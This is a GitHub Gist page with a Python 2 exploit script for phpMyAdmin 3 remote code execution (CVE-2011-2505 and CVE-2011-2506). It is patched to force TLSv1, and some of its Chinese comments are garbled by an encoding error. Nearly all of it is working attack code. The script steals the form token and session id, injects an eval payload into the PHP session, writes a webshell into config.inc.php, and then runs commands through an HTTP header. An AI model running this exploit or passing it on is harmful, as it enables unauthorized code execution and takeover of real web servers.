Last active
May 11, 2020 18:17
-
-
Save thel3l/c585bc6123fdee05493a4db6b09f5440 to your computer and use it in GitHub Desktop.
phpMyAdmin3 (pma3) - Remote Code Execution - CVE-2011-2505, CVE-2011-2506 (https://www.exploit-db.com/exploits/17510/): Fixes urlopen SSL 'Version too Low' errors
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf-8 | |
# pma3 - phpMyAdmin3 remote code execute exploit | |
# Author: wofeiwo<wofeiwo@80sec.com> | |
# Thx Superhei | |
# Tested on: 3.1.1, 3.2.1, 3.4.3 | |
# CVE: CVE-2011-2505, CVE-2011-2506 | |
# Date: 2011-07-08 | |
# Have fun, DO *NOT* USE IT TO DO BAD THING. | |
################################################ | |
# Requirements: 1. "config" directory must created&writeable in pma directory. | |
# 2. session.auto_start = 1 in php.ini configuration. | |
import os,sys,urllib2,re,ssl | |
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1) | |
def usage(program): | |
print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code execute exploit" | |
print "Usage: %s <PMA_url>" % program | |
print "Example: %s http://www.test.com/phpMyAdmin" % program | |
sys.exit(0) | |
def main(args): | |
try: | |
if len(args) < 2: | |
usage(args[0]) | |
if args[1][-1] == "/": | |
args[1] = args[1][:-1] | |
# ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ� | |
print "[+] Trying get form token&session_id.." | |
content = urllib2.urlopen(args[1]+"/index.php", context=gcontext).read() | |
r1 = re.findall("token=(\w{32})", content) | |
r2 = re.findall("phpMyAdmin=(\w{32,40})", content) | |
if not r1: | |
r1 = re.findall("token\" value=\"(\w{32})\"", content) | |
if not r2: | |
r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content) | |
if len(r1) < 1 or len(r2) < 1: | |
print "[-] Cannot find form token and session id...exit." | |
sys.exit(-1) | |
token = r1[0] | |
sessionid = r2[0] | |
print "[+] Token: %s , SessionID: %s" % (token, sessionid) | |
# �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ | |
print "[+] Trying to insert payload in $_SESSION.." | |
uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA" | |
url = args[1]+uri | |
opener = urllib2.build_opener() | |
opener.addheaders.append(('Cookie', 'phpMyAdmin=%s; pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' % (sessionid, sessionid))) | |
urllib2.install_opener(opener) | |
urllib2.urlopen(url, context=gcontext) | |
# ����setup��ȡshell | |
print "[+] Trying get webshell.." | |
postdata = "phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save" % (sessionid, token) | |
url = args[1]+"/setup/config.php" | |
# print "[+]Postdata: %s" % postdata | |
urllib2.urlopen(url, postdata, context=gcontext) | |
print "[+] All done, pray for your lucky!" | |
# ���IJ����������shell | |
url = args[1]+"/config/config.inc.php" | |
opener.addheaders.append(('Code', 'phpinfo();')) | |
urllib2.install_opener(opener) | |
print "[+] Trying connect shell: %s" % url | |
result = re.findall("System \</td\>\<td class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url, context=gcontext).read()) | |
if len(result) == 1: | |
print "[+] Lucky u! System info: %s" % result[0] | |
print "[+] Shellcode is: eval(getenv('HTTP_CODE'));" | |
else: | |
print "[-] Cannot get webshell." | |
except Exception, e: | |
print e | |
if __name__ == "__main__" : main(sys.argv) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment